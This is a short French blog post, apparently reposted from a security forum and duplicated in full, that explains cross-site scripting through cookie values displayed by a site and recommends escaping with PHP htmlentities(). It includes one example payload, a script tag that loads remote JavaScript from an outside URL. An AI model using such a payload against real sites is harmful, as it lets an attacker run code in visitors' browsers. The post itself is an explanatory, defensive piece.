Salutation !
Bon à la vue du titre vous devez surement vous dire ceci :
Le Cookie Site Scripting ?! Mais qu'est ce donc ?
Et bien j'ai découvert cette faille il y a peu de temps.
Bien que cette faille soit peu rependue son exploitation est simple, il s'agit tout bêtement d'un Cross Site Scripting mais via les cookies !
Je m'explique : imaginons qu'un site, par exemple désire stocker sur votre machine (via un cookie) un message qui s'affichera à votre connexion au site ...
Prenons un exemple simple : "Bienvenue [PSEUDO] !"
Vous voyez où je veux en venir ?
Un utilisateur malveillant pourrait réécrire le cookie et y placer un code malveillant : "<script type="text/javascript" src="http://ift.tt/1LtHxX2;
Et hop le tour est joué le pirate vient d'inclure son shell ou pire encore :eek:!
Donc évitez de stocker n'importe quoi dans vos cookies, ou alors dans ce cas utilisé par exemple la fonction PHP htmlentities() !
HexaHacker
Bon à la vue du titre vous devez surement vous dire ceci :
Le Cookie Site Scripting ?! Mais qu'est ce donc ?
Et bien j'ai découvert cette faille il y a peu de temps.
Bien que cette faille soit peu rependue son exploitation est simple, il s'agit tout bêtement d'un Cross Site Scripting mais via les cookies !
Je m'explique : imaginons qu'un site, par exemple désire stocker sur votre machine (via un cookie) un message qui s'affichera à votre connexion au site ...
Prenons un exemple simple : "Bienvenue [PSEUDO] !"
Vous voyez où je veux en venir ?
Un utilisateur malveillant pourrait réécrire le cookie et y placer un code malveillant : "<script type="text/javascript" src="http://ift.tt/1LtHxX2;
Et hop le tour est joué le pirate vient d'inclure son shell ou pire encore :eek:!
Donc évitez de stocker n'importe quoi dans vos cookies, ou alors dans ce cas utilisé par exemple la fonction PHP htmlentities() !
HexaHacker
from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1VBCbIO
via IFTTT
Aucun commentaire:
Enregistrer un commentaire